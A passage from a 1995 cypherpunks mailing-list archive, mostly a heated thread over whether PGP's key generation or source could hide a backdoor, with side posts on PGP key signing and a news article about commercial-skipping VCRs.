From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 16:54:53 PDT
To: jfmesq@ibm.net (James F. Marshall)
Subject: Re: Public Key Confusion
In-Reply-To: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net>
Message-ID: <199507312354.TAA02802@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


When you want to sign a key, you should use "pgp -ks".  You should
never clearsign a public key -- it buys you absolutely nothing other
than saying that "I saw this key at some point, and this message
(which is a public key block) came from me".  

Have you signed your own key using "pgp -ks"?  Have you extracted your
key (using "pgp -kxa") since you signed it?  Or did you only extract
it before you signed it?  This would be the cause of the confusion.

If you sign a key, the signature gets attached to the key certificate.
However you do not need that signature in order to _use_ the key.  So,
people to whom you gave your key without a signature can still use
that key, it just doesn't have your signature on it.

As for the keyserver, it _ONLY_ accepts keys; if you clearsign your
key before you send it, then you are not sending a key, you are
sending a message that contains a key.  This is not the same thing.
That is why the keyserver rejected it.

> Should I just stop distributing the .asc version and only let people
> have the longer version extracted from my public keyring?  Is that the
> properly signed copy?

If you performed the pgp -ks, then you should re-perform the pgp -kxa
and distribute the newly extracted key.

I hope this answers all your questions.  All of this, and more, should
be explained in the PGP Documentation which is included with PGP.

Good Luck.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 20:07:13 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: hunting for no hole in PGP
Message-ID: <9508010307.AA21546@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>How do you propose that a user's keystrokes can be analyzed? 
        
I have an idea. (many voices groaning...)  The "reduced keyspace" 
and the "subliminal channels" fear both come from the mysterious 
process of choosing the 128-bit IDEA key. The other bogeyman that 
I hear the most about in PGP is the public/private  key generation.  
Random numbers scare people, including me.

Could PGP use and IDEA key that is the MD5 hash of the "random number" 
(the way it is currently calculated) concatenated with the message 
itself?  It would be easy to verify that the correct key had been selected.  
It would be impossible for some "ghost" in the random number routines 
to use a predictably reduced keyspace, or to send subliminal data, 
because its output never (directly) gets sent.  Something similar could 
be done during public/private key generation.

Have the PGP folks considered doing something similar?  Sometimes 
this seems like a good idea to me, and other times it looks like 
useless effort and one more opportunity for something to go wrong.






 
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 17:14:30 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: a hole in PGP
In-Reply-To: <v02120d01ac431417e9c5@[199.0.65.105]>
Message-ID: <9508010008.AA02790@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 6:53 PM 7/31/95, Dr. Fred said:
> >        Why (specifically) do you think the MIT version of PGP has no
> >backdoors and is not subject to attacks such as the one outlined in my
> >previous posting?
> 
> <Metzger_mode("on")>
> 
> I've been watching this gark long enough, I think.
> 
> Look. If you're qualified, look at the PGP source and vet it yourself. If
> you aren't qualified, figure the market to be efficient in this instance
> and assume the stuff works.

One of the several points I tried (apparently unsuccessfully) to make is
that with a program that large, it is impractical to verify that there
are no subtle back doors - regardless of how knowledgeable or skilled
you or I may be.  Your "assumption of security" perspective is an
inappropriate one unless you are trying to get people to use something
that is not secure. 

> Stop wasting our time and bandwidth harassing the MIT folk about whether or
> not their code is clean. Such posturing won't wash around here.

The headers on the postings allow you to ignore them, but in the
meanwhile, the subject matter is in line with this forum, and the
questions are legitimate.  You will have to do better than to appeal to
authority to convince anyone that MIT's version of PGP is secure.

> <Metzger_mode("off")>
> 
> Seriously, it may be an appeal to authority, but it can safely be assumed
> that PGP is clean, and that MIT is *not* involved with the NSA and the Red
> Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
> postings.

Why (specifically) do you think so? Because you claim it? Because the
MIT maintainer claims it? You say MIT is not associated with the NSA,
but they have historically been funded by the NSA and other federal
agencies for work on information security.  Do you really think that the
only information protected by PGP is dirty pictures? Do you somehow
think that MIT and the NSA are above that sort of thing? All you have to
do is look at history, and it should be clear that this appeal to
authority is often used by those trying to cover things up.  If you know
something about PGPs security that you aren't telling us, don't beat
around the bush about it.  Come out and say it.  Tell us that you have
proven that PGP has no backdoors and what method you used to do that. 
Tell us that you have hand verified all the code and that none of it
overwrites the key generation process and tell us how you verified it.

It cannot be safely assumed that any program is clean or that any one
person or group is not involved with intentionally subverting security.
That violates the fundamental principles of information protection.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 20:12:45 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Attacks on PGP
Message-ID: <ac42e8ea06021004cdb1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:51 AM 8/1/95, Matt Blaze wrote:

>Tim,
>
>My impression (based on reviewing papers for the last few CRYPTOs and
>EUROCRYPTs) is that the reason for the lack of "practical" papers is
>primarily that not very many of them get submitted.  In fact, I think

Right, but it's a kind of vicious circle. What I meant about cryptanalysis
not really be "academic" is that not much status attaches to having broken
a specific message.

>there actually are a fair number of cryptanalysis papers at CRYPTO,
>at least compared with the even smaller number of papers there that
>describe new ciphers.  Anyway, cryptanalysis IS part of the mainstream
>of the academic crypto world these days (consider differential
>cryptanalysis, linear cryptanalysis, etc.)

I guess this is my bias, as I think of the "differential cryptanalysis" as
not really being cryptanalysis :-}. In the sense that it's basic research
unto itself, not the grungy cracking of an actual cipher.

But you're right that the stuff on Wiener's estimates for a DES-cracking
machine, on the differential cryptanalysis work, etc., _does_ make it into
Crypto. Ditto for breaking ciphers (showing them to be flawed). I just
never see papers describing actual attacks on specific systems...maybe
those who do such things are talking?

I guess the bottom line of what I'm saying is that if some person or group
wants to be a "tiger team" to try to find flaws in PGP, to try to break it,
this would be a nifty thing. I doubt anyone on this list disagrees.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:33:39 PDT
To: enzo@ima.com
Subject: Zimmermann legal fund
In-Reply-To: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
Message-ID: <199508010129.AA00881@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT)
   From: Enzo Michelangeli <enzo@ima.com>

   How could it be worse than with the U.S. of A.?? ;-)

OK... think about Venezuela. It has bad inflation. It has laws against
converting local currency to US dollars on the black market, which is
basically defined as any agency/person/corporate entity exchanging at
a worse rate than the government rate (at least in Venezuela itself;
you can pay your foreign creditors in Bolivars and exchange them on
the open market for twice the official exchange rate); all
government-rate currency transactions must go through a special
currency review board that checks to see if you _really_ need to
exchange currency. It is illegal to bribe this board and impossible to
get a request acknowledged inside a year without bribery (if it isn't
denied because you didn't bribe the members of the board).

Of course, one day the U.S. may be this bad.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:35:53 PDT
To: bdavis@thepoint.net
Subject: FBI shirts...
In-Reply-To: <Pine.D-G.3.91.950731001926.21909A-100000@dg.thepoint.net>
Message-ID: <199508010131.AA01279@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Hmmph. How boring. If I had the money, I think I'd buy you one
of those "Weekly World News" cover page T-shirts. I want to get
the one with "12 US Senators are Space Aliens" because it has
both of my Senators on the cover, myself...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 17:37:01 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d06ac432493c978@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 7/31/95, Dr. Fred said:

>it is impractical to verify that there
>are no subtle back doors

Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would
come in handy some day.  In the sophistry biz, the above is an informal
fallacy. It's called a disproving a negative, more popularly called the
"Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP
trap-doors) don't exist".

I would put the rest of your rejoinder in the same class of tinker-toy
logic, Doc.

You're testing my patience. Feeling flush from my New Orleans road trip, I
went out and bought the commercial version of Eudora, filter-feature and
all, which means I'm just itching to test it. In other words, it means you
are flirting with the kill-file, the bozo-filter, more rudely, a
<plonk!ing>.

Play nice, Doc, or don't play at all.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:45:59 PDT
To: stewarts@ix.netcom.com
Subject: Sat phone permit "wire"taps
In-Reply-To: <199507310913.CAA02091@ix2.ix.netcom.com>
Message-ID: <199508010141.AA02724@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill, I also understood that the Walkers also leaked to the Soviets
details on U.S. submarine sonar operating procedures.

_Anyway_, my point was, if they can't keep _that_ secret, I doubt
they'd be able to keep secret the details/keys for activating the
backdoor on whatever artificially weakened system they're forced to
use (if they are).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:51:30 PDT
To: danisch@ira.uka.de
Subject: Sex & Crime TV filter
In-Reply-To: <9507311424.AA01110@elysion.iaks.ira.uka.de>
Message-ID: <199508010146.AA03453@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 31 Jul 1995 16:24:25 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Yesterday I heard in the radio that someone in America has developed
   some device which darkens the TV screen if there is sex or crime on TV. 

   Does anyone know whether this is true and how it works?

   Hadmut

Actually it's licensed from a British manufacturer of sunglasses called
the Peril-Sensitive Sense-O-Matics, which darken rapidly to keep you
from seeing things that might distress you.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 17:56:16 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <9508010049.AA05263@all.net>
MIME-Version: 1.0
Content-Type: text


> > 	Your assertion that I could find the backdoor by inspecting the
> > program is the wrong tactic for secure programs.  If you want people to
> > believe that a program is secure, you had better come up with good
> > reasons that it is secure, and not hide behind "if you can't find any
> > holes, it must be secure".
> 
> This is where you are very wrong.  I am not saying that "if you can't
> find any holes it must be secure".  What I am saying is that the
> source is available, and thousands of people have looked at the
> source, and none of them have found any holes in it.

History shows that your approach fails. Here are some examples:

	Tens of thousands of people had source to the http daemon from
	CERN, and yet none of them noticed a hole that was detected as
	it was being exploited only a few months ago. 

	Tens of thousands of people have access to sendmail and yet
	new holes are found by attackers several times per year on
	average.

	Tens of thousands of people have access to the sources of
	various versions of hundreds of software packages, yet there
	are holes found every day.

> >  - to wit: What makes you think PGPs method
> > of getting seeds does not lead to a limited key space that is within the
> > realm of modern computers to search?
> 
> How do you propose that a user's keystrokes can be analyzed?  If you
> assume that the PC's internal clock speed >> typing speed (which is a
> good assumption -- how many keystrokes/second can you type?) then you
> have a large amount of randomness that can be gained from timing
> keystrokes.  Even a good typist will not have an even typestroke!
> Have you read RFC 1750?  If not, I would recommend you read it before
> you consider continuing this thread!

Request for Comments: 1750 - Randomness Recommendations for Security

"...Choosing random quantities to foil a resourceful and motivated
adversary is surprisingly difficult.  ...recommends the use of truly
random hardware techniques and shows that the existing hardware on many
systems can be used for this purpose."

PGP does not use "truly random hardware techniques"

"...For the present, the lack of generally available facilities for
generating such unpredictable numbers is an open wound in the design of
cryptographic software.  ...  the only safe strategy so far has been to
force the local installation to supply a suitable routine to generate
random numbers.  To say the least, this is an awkward, error-prone and
unpalatable solution." - 1994 - after PGP was implemented.

and then: "This informational document suggests techniques for producing
random quantities that will be resistant to such attack.  It recommends
that future systems include hardware random number generation or provide
access to existing hardware that can be used for this purpose."

"...Systems like Kerberos, PEM, PGP, etc.  are maturing and becoming a
part of the network landscape [PEM].  These systems provide substantial
protection against snooping and spoofing.  However, there is a potential
flaw.  At the heart of all cryptographic systems is the generation of
secret, unguessable (i.e., random) numbers. "

(Internet RFCs are searchable at http://all.net)

So I guess the RFC supports my contention and not yours.

> > 	Why (specifically) do you think the MIT version of PGP has no
> > backdoors and is not subject to attacks such as the one outlined in my
> > previous posting?
> 
> I think it has no backdoors because Jeff Schiller and I (among others)
> have looked closely at the random number generator code (he has taken
> a much closer look than I) and believe it to be secure.  I also know
> that I did not put any backdoors into the code (but why would you
> believe me, I must be paid by the government to say this, right?)

You might be, but even if you are not, that doesn't mean there are no
back doors.  Your inability to detect a backdoor gives me little
confidence, since this is at least an NP-complete problem and, with all
due respect, today, nobody can prove that PGP is free of backdoors

> As to why I believe it is not subject to attack, I ask you again to go
> read RFC 1750.  PGP follows its recommendations fairly closely.  There
> is only one place where PGP fails to follow, and that is that PGP does
> expose the bucket of random bits, rather than mixing them before
> exporting them.  However I do not believe that this would affect the
> generation of PGP Public Keys.

But the RFC acknowledges that these methods are highly suspect and should
not be trusted.

> PS: In what field is your Doctorate?

Ph.D. Electrical and Computer Engineering, U. of Southern California, 1986,
subject "Computer Viruses".  My complete resume is available through the W3
server (below) under Management Analytics.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 18:00:55 PDT
To: cypherpunks@toad.com
Subject: Commercial killers
Message-ID: <v02120d01ac432cb8b351@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


God help me, all of this reminds me of a Carl Sagan book, of all things.
One of his science fiction characters was said to have made his first
fortune by building a commercial zapping chip for VCRs.

Butthead Astronomer, indeed...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 18:10:12 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: a hole in PGP
In-Reply-To: <v02120d06ac432493c978@[199.0.65.105]>
Message-ID: <9508010103.AA06094@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 8:08 PM 7/31/95, Dr. Fred said:
> 
> >it is impractical to verify that there
> >are no subtle back doors
> 
> Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would
> come in handy some day.  In the sophistry biz, the above is an informal
> fallacy. It's called a disproving a negative, more popularly called the
> "Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP
> trap-doors) don't exist".

More accurately, you cannot prove a forall statement about an infinite
set by demonstrating examples - but you can disprove it with a single
refutation, however, your argument is incorrect in this context.

Since computers current digital computers (and programs) are (close to)
finite state machines, we can prove many forall statements.  But even
more to the point, it is the job of the person asking you to trust them
to justify that trust.  If you trust them with a less-than-adequate
basis, you have only yourself to blame when you get burned. 

> I would put the rest of your rejoinder in the same class of tinker-toy
> logic, Doc.

That's me - a tinker-toy logician.  But why do you believe that PGP can be
trusted?  Because someone told you so in email on an Internet forum?  I
would hate to bet billions of dollars a day and the lives of hundreds of
thousands of people on that judgement.

> You're testing my patience. Feeling flush from my New Orleans road trip, I
> went out and bought the commercial version of Eudora, filter-feature and
> all, which means I'm just itching to test it. In other words, it means you
> are flirting with the kill-file, the bozo-filter, more rudely, a
> <plonk!ing>.

Ah!!! A threat.  You should be aware that threatening homocide is a form
of assault.  I will be certain to tell the FBI your exact words...  "the
kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
(and may well sound to them) like a threat to commit murder. 

> Play nice, Doc, or don't play at all.

I am being nice, but you are not.  Perhaps you should consider
addressing the issues.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@netmarket.com (Daniel Kohn)
Date: Mon, 31 Jul 95 18:06:24 PDT
To: pjm@ionia.engr.sgi.com (Patrick May)
Subject: Re: Sex & Crime TV filter
Message-ID: <v02120d1aac432e074238@[172.16.1.244]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 8:50 PM 07/31/95, Patrick May wrote:

>     My dim memories from a project I did for Sony a couple of years
>ago are that commercials are separated by a fixed number of black
>frames and some, at least, have tracking information encoded so that
>advertisers can monitor how often they are played.  I'll try to dig up
>more info.

From: dfitzpat@interserv.com
      Wednesday July 26, 1995 -- ShopTalk

- --

NEW VCRs TAKE ON COMMERCIALS POINT-BLANK

                        By Jonathan Takiff
               Philadelphia Daily News Staff Writer


Already besieged by Washington politicians over the content of TV
programming (and threats of a show-blocking chip), television
broadcasters are about to be hit with another whammy.  This time it's
VCRs that automatically blank out commercials.

Next month, Thomson Consumer Electronics will introduce two RCA brand
videocassette recorder models that eliminate almost all the commercials
during the playback of a recorded program.

As fast as you can say, "We'll be back with stupid pet tricks, tonight's
Top Ten list and our special guest Madonna," the VCR will go into hyper-
drive and zip through two or three minutes of commercials.  During the
interruption, you can choose to see a solid blue screen on the TV
or the commercials zipping by in the rapid scan mode.

Most human operators working a remote control during a commercial break
tend to over-run the ads and plow into the show, forcing the fastidious
amongst us to then back up (yawn) the tape into the end of the last
advertisement.  But RCA's commercial-free VCR hits the brakes and
resumes play at just the right second.  At least it did in a recent
demonstration I got of the machine.

Thomson is promising "90 percent accuracy" in eliminating commercials --
and just commercials.  Sorry, the special circuitry doesn't work at all
on show breaks that are 30 seconds or less in duration.  And in case you
were worried, the recording is not tampered with in the least.  Should
there be adverts you do desire to see, or (Heaven forbid) the VCR scans
past something important, the commercial-jump mode is defeatable at any
time.

When the feature is set in the manual mode, the user initiates the
skipping process by a single button pressed on the remote control.

Most important, this technology is stupid-proof.  That is, it literally
runs itself and doesn't affect the way you tape a program.  Simply set
the timer (or hit the one-touch record button) as normally.  After a
show is recorded, the VCR checks to see if another taping session has
been programmed to start immediately.  If not, the deck will
automatically rewind the tape and then search through the recording for
signs of commercial breaks.

Actually, the VCR is looking for "rapid shits in programming matter and
brief screen blackouts that indicate advertising," explains Randy
Staffs, manager of VCR product management for Thomson.

Where it senses a commercial clump, the VCR makes an electronic notch on
the tape at the beginning and end of the segment.  Later, these notches
will cue the VCR to fast-scan over the segment.

Originally announced two years ago for an add-on black box product
(Arista's Commercial Brake) that got lots of ink but never came to
market, Thomson has "considerably refined the [skipping] technology" it
has licensed from Arthur D. Little Enterprises, Staggs says.  "We've
changed all the algorithms [computer formulas] used for spotting the
commercials."

Thomson has exclusive rights to make commercial-free VCRs at least
through the end of the year.  It's producing the decks under guarded
conditions, Staggs says, "to hold onto our trade secrets for as long as
possible."

You'll find the commercial skip feature in RCA's hi-fi VR678HF ($499)
and four-head monaural VR542 ($399) VCR.  Both also boast VCR Plus+
programming and compatibility with the RCA Digital Satellite system.
The models should hit dealers' shelves in late August or early
September.

P.S.  Staggs claims these VCRs are "specially programmed" to not skip
past commercials for RCA products.  We think he's kidding.

$$$$ $$$$$ $$$$
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ
7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA
pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm
qbFhOteJavc=
=Opny
-----END PGP SIGNATURE-----

                                                           dan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 18:10:19 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d03ac432dc9f3b8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 PM 7/31/95, Dr. Fred said:

>You might be, but even if you are not, that doesn't mean there are no
>back doors.

Well, we all knew it would happen, didn't we. I feel like I'm about to shoot
Ol' Yeller, but...

PLONK!

See ya on the other side, Fred.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 18:05:10 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508010112.VAA26078@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


...
>> Look. If you're qualified, look at the PGP source and vet it yourself. If
>> you aren't qualified, figure the market to be efficient in this instance
>> and assume the stuff works.
>
>One of the several points I tried (apparently unsuccessfully) to make is
>that with a program that large, it is impractical to verify that there
>are no subtle back doors - regardless of how knowledgeable or skilled
>you or I may be.  Your "assumption of security" perspective is an
>inappropriate one unless you are trying to get people to use something
>that is not secure. 
>

It's true that, in general, the "burden" of demonstrating whether a
system is secure should fall primarily on those who claim it is rather
than on those who claim it isn't.  It's also true that PGP, for
whatever reason, is treated with a degree of reverence that is,
perhaps, unwarranted.  I, for one, would be much happier to see
greater vetting of widely-used programs like PGP.  But that does not
mean that one can expect to be taken seriously by simply throwing
darts and seeing where they land.  That would mean that essentially no
hardware, software, algorithm or protocol could ever be considered
trustworthy by anyone for any purpose.  There is a difference between
raising specific concerns and making vague, wild, unsupported claims,
which is how what you wrote below reads to me.

>> Stop wasting our time and bandwidth harassing the MIT folk about whether or
>> not their code is clean. Such posturing won't wash around here.
>
>The headers on the postings allow you to ignore them, but in the
>meanwhile, the subject matter is in line with this forum, and the
>questions are legitimate.  You will have to do better than to appeal to
>authority to convince anyone that MIT's version of PGP is secure.
>
>> <Metzger_mode("off")>
>> 
>> Seriously, it may be an appeal to authority, but it can safely be assumed
>> that PGP is clean, and that MIT is *not* involved with the NSA and the Red
>> Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
>> postings.
>
>Why (specifically) do you think so? Because you claim it? Because the
>MIT maintainer claims it? You say MIT is not associated with the NSA,
>but they have historically been funded by the NSA and other federal
>agencies for work on information security.  Do you really think that the
>only information protected by PGP is dirty pictures? Do you somehow
>think that MIT and the NSA are above that sort of thing? All you have to
>do is look at history, and it should be clear that this appeal to
>authority is often used by those trying to cover things up.  If you know
>something about PGPs security that you aren't telling us, don't beat
>around the bush about it.  Come out and say it.  Tell us that you have
>proven that PGP has no backdoors and what method you used to do that. 
>Tell us that you have hand verified all the code and that none of it
>overwrites the key generation process and tell us how you verified it.
>

No one knows how "prove" anything substantial, much less the absence
of backdoors, for anything but the most trivial software and
algorithms.

>It cannot be safely assumed that any program is clean or that any one
>person or group is not involved with intentionally subverting security.
>That violates the fundamental principles of information protection.

Your attempt to cast a near-defamatory shadow of suspicion over the
individuals and institutions who wrote the software, without raising
even a single specific concern about something you've observed about
the code, invites more questions about your own motives than those of
MIT or its staff.  It seems reasonable to ask you to put up or shut
up.

-matt

Disclaimer: I also give away cryptographic source code, in connection
with my job as a research scientist for a company that has even closer
ties to the spook community than you seem to think MIT has...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Mon, 31 Jul 95 20:15:55 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <Pine.3.89.9507312156.D29071-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> That's me - a tinker-toy logician.  But why do you believe that PGP can be
> trusted?  Because someone told you so in email on an Internet forum?  I
> would hate to bet billions of dollars a day and the lives of hundreds of
> thousands of people on that judgement.

Oh, yeah, right...

> > You're testing my patience. Feeling flush from my New Orleans road trip, I
> > went out and bought the commercial version of Eudora, filter-feature and
> > all, which means I'm just itching to test it. In other words, it means you
> > are flirting with the kill-file, the bozo-filter, more rudely, a
> > <plonk!ing>.
> 
> Ah!!! A threat.  You should be aware that threatening homocide is a form
> of assault.  I will be certain to tell the FBI your exact words...  "the
> kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
> (and may well sound to them) like a threat to commit murder. 

Just goes to show you that you really CAN tell the idiots on the net - 
they usually sign some sort of pompous title before their name.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 19:18:07 PDT
To: fc@all.net
Subject: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508010213.AA07127@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Mon, 31 Jul 1995 20:08:15 -0400 (EDT)

   One of the several points I tried (apparently unsuccessfully) to make is
   that with a program that large, it is impractical to verify that there

For better or for worse, we all must use programs (or collections
of programs) that large or larger: even if PGP could be implemented
in 1 % of the current source code, it would still be running in an
operating system that's cramped in 4 megabytes of ram, because that's
a characteristic of the common modern operating systems.

The operating systems PGP is running in are larger than PGP itself; if 
PGP is too large to practically verify the nonexistance of back doors,
then there's nothing we can do whatsoever to disprove the existance
of back doors.

...are no subtle back doors - regardless of how knowledgeable or skilled
   you or I may be.  Your "assumption of security" perspective is an
   inappropriate one unless you are trying to get people to use something
   that is not secure. 

Or unless you're trying to subject a program to a standard nothing
ever written these days is going to meet because it runs in an
operating system that's a lot harder to verify as being secure.

Please note: I am not trying to suggest that there are purposeful or
inadvertent back doors in any of the variants of PC-DOS, Windows, or
the Macintosh OS, or more than usual in the various Unix variants (of
which the details are available on RISKS; of course, Unix can probably
be made reasonably secure if one is aware of the issues involved,
which isn't a bad idea. This isn't meant to be a disendorsement of
Unix.)

   The headers on the postings allow you to ignore them, but in the
   meanwhile, the subject matter is in line with this forum, and the
   questions are legitimate.  You will have to do better than to appeal to
   authority to convince anyone that MIT's version of PGP is secure.

Can you _convince_ me that MacOS 7.5, or Windows 3.1 (the OS I
currently use), or WWG, or OS/2 3.0, or Linux, or NetBSD, is
reasonably secure?

   Why (specifically) do you think so? Because you claim it? Because the
   MIT maintainer claims it? You say MIT is not associated with the NSA,
   but they have historically been funded by the NSA and other federal
   agencies for work on information security.  Do you really think that the
   only information protected by PGP is dirty pictures? Do you somehow
   think that MIT and the NSA are above that sort of thing? All you have to
   do is look at history, and it should be clear that this appeal to
   authority is often used by those trying to cover things up.  If you know
   something about PGPs security that you aren't telling us, don't beat
   around the bush about it.  Come out and say it.  Tell us that you have
   proven that PGP has no backdoors and what method you used to do that. 
   Tell us that you have hand verified all the code and that none of it
   overwrites the key generation process and tell us how you verified it.

   It cannot be safely assumed that any program is clean or that any one
   person or group is not involved with intentionally subverting security.
   That violates the fundamental principles of information protection.

What OS should I use to do this? Should I just give up on anything
beyond TRS-DOS 6.2?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 18:26:47 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: a hole in PGP
In-Reply-To: <199508010112.VAA26078@crypto.com>
Message-ID: <9508010120.AA07073@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It's true that, in general, the "burden" of demonstrating whether a
> system is secure should fall primarily on those who claim it is rather
> than on those who claim it isn't.  It's also true that PGP, for
> whatever reason, is treated with a degree of reverence that is,
> perhaps, unwarranted.  I, for one, would be much happier to see
> greater vetting of widely-used programs like PGP.

Excellent assessment - I wholely agree with it.

>  But that does not
> mean that one can expect to be taken seriously by simply throwing
> darts and seeing where they land.  That would mean that essentially no
